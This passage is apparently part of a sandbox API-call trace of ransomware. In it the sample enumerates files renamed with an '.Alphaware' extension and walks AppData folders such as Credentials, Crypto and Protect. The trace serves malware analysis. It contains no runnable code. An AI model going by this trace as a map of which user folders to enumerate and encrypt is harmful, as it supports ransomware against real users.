ftLastAccessTime.dwLowDateTime=0x9134c250, ftLastAccessTime.dwHighDateTime=0x1d96bef, ftLastWriteTime.dwLowDateTime=0x88cdcb40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12f74, dwReserved0=0x0, dwReserved1=0x0, cFileName="w1qxUxlTv5acD7ekU7.mkv.Alphaware", cAlternateFileName="W1QXUX~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0090960, ftCreationTime.dwHighDateTime=0x1d97671, ftLastAccessTime.dwLowDateTime=0x18e72e90, ftLastAccessTime.dwHighDateTime=0x1d97677, ftLastWriteTime.dwLowDateTime=0x88d4ef60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c934, dwReserved0=0x0, dwReserved1=0x0, cFileName="wY-iL 75UNFS8BKTR.wav.Alphaware", cAlternateFileName="WY-IL7~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ad4b00, ftCreationTime.dwHighDateTime=0x1d967d6, ftLastAccessTime.dwLowDateTime=0x10434c10, ftLastAccessTime.dwHighDateTime=0x1d96d99, ftLastWriteTime.dwLowDateTime=0x88dc1380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="z2r-DGhdhEVsMRYoTz.mp3.Alphaware", cAlternateFileName="Z2R-DG~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ad4b00, ftCreationTime.dwHighDateTime=0x1d967d6, ftLastAccessTime.dwLowDateTime=0x10434c10, ftLastAccessTime.dwHighDateTime=0x1d96d99, ftLastWriteTime.dwLowDateTime=0x88dc1380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="z2r-DGhdhEVsMRYoTz.mp3.Alphaware", cAlternateFileName="Z2R-DG~1.ALP")) returned 0 [0091.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0091.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0091.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0091.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0091.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 0 [0091.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0091.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0091.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0091.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0091.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0091.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0091.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0091.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0091.708] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.708] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0091.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0091.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0091.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0091.708] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.709] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0091.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0091.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0091.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0091.709] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.709] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0091.709] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0091.709] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0091.709] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0091.709] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0091.710] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0091.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0091.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0091.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0091.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, 